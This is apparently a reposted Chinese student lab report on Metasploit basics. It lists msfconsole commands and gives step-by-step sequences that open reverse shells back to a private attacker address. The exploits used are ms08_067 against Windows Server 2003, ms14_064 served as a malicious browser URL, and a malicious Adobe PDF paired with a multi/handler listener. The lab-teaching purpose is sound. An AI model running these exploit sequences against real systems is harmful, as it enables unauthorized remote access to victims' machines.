2019-2020-2 网络对抗技术 20175330杨璟旭 Exp6 MSF基础应用

2019-2020-2 网络对抗技术 20175330杨璟旭 Exp6 MSF基础应用

一、目录

  1. 基础知识
  • MSF简介
  • 常用命令
  1. 实验内容
  •   1.1一个主动攻击实践:ms08_067; (1分)
  •   1.2 一个针对浏览器的攻击:ms14-64(成功)、ms14-62(成功);(1分)
  •   1.3 一个针对客户端的攻击:Adobe(失败);(1分)
  •   1.4 成功应用任何一个辅助模块:scanner/http/ssl(成功)(0.5分)
  1. 实验中遇到的问题
  2. 基础问题回答
  3. 实验总结

1.基础知识

MSF简介

  Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

常用命令

show exploits

列出metasploit框架中的所有渗透攻击模块。

show payloads

列出metasploit框架中的所有攻击载荷。

show auxiliary

列出metasploit框架中的所有辅助攻击载荷。

search name

查找metasploit框架中所有的渗透攻击和其他模块。

info

展示出制定渗透攻击或模块的相关信息。

use name

装载一个渗透攻击或模块。

LHOST

你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。

RHOST

远程主机或是目标主机。

set function

设置特定的配置参数(EG:设置本地或远程主机参数)。

setg function

以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。

show options

列出某个渗透攻击或模块中所有的配置参数。

show targets

列出渗透攻击所有支持的目标平台。

set target num

指定你所知道的目标的操作系统以及补丁版本类型。
更多请参照:https://www.jianshu.com/p/f82386b8a9ac

2.实验内容

2.1一个主动攻击实践

2.11ms08_067(成功)

输入search ms08-067,可以看到该漏洞的渗透模块:

输入show playdols可以查看PLAYLOADS

输入show targets可以看到targets,输入0可以自动识别。

扫描二维码关注公众号,回复: 11140842 查看本文章

在kali输入 msconsole进入控制台输入以下命令

    msf > use exploit/windows/smb/ms08_067_netapi//进入ms08_067_netapi模块
    msf exploit(ms08_067_netapi) > show payloads//查看设置信息
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //设置payload
    msf exploit(ms08_067_netapi) > set LHOST 192.168.98.130 //设置攻击机回连ip
    msf exploit(ms08_067_netapi) > set LPORT 5330 //设置接收端口
    msf exploit(ms08_067_netapi) > set RHOST 192.168.98.132 //目标机靶机ip
    msf exploit(ms08_067_netapi) > set target 0 //选择目标系统类型
    msf exploit(ms08_067_netapi) > exploit //攻击

目标靶机为windows_2003_ent_sp1

攻击成功后输入ver查看版本信息:

2.2 一个针对浏览器的攻击

2.2.1 ms11_050(失败)

2.2.2ms14-062(成功)

输入search ms14-062可以看到该漏洞的攻击模块,选择其中的exploit/windows/browser/ms14_064_ole_code_execution

输入如下命令

msf exploit(ms14_064_netapi) >use exploit/windows/browser/ms14_064_ole_code_execution//进入ms14_064_ole_code_execution模块
msf exploit(ms14_064_netapi) >set payload windows/meterpreter/reverse_tcp//设置payload
msf exploit(ms14_064_netapi) >show options//查看设置信息
msf exploit(ms14_064_netapi) > set LHOST 192.168.98.130 //设置攻击机回连ip msf exploit(ms14_064_netapi) > set LPORT 5330 //设置接收端口
msf exploit(ms14_064_netapi) > exploit //攻击

 

生成的URL为:http://192.168.98.130:8080/usCDYS

在windows xp上的ie浏览器中输入这个网址打开:

回到kali发现回连成功:

 2.3攻击客户端的实践

2.31 Adobe

 输入search adobe查看adobe的漏洞攻击模块

打开MSF 输入如下命令

search adobe //查找Adobe可以利用的漏洞模块
use windows/fileformat/adobe_cooltype_sing //使用adobe_cooltype_sing漏洞模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.98.130 //攻击者监听地址
set FILENAME 20175330.pdf //设置生成的文件名
exploit //运行模块

将PDF文件导入windows 7后输入back推出当前模块

输入以下命令打开监听模块

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.1.7 //监听者地址
exploit //运行模块

 

 在被攻击机打开PDF文件

2.4成功应用任何一个辅助模块

 2.41 

辅助模块——scanner/http/ssl

功能:解析服务器SSL证书以获取通用名称和签名算法

设置参数

输入run运行

猜你喜欢

转载自www.cnblogs.com/waaaaa/p/12791035.html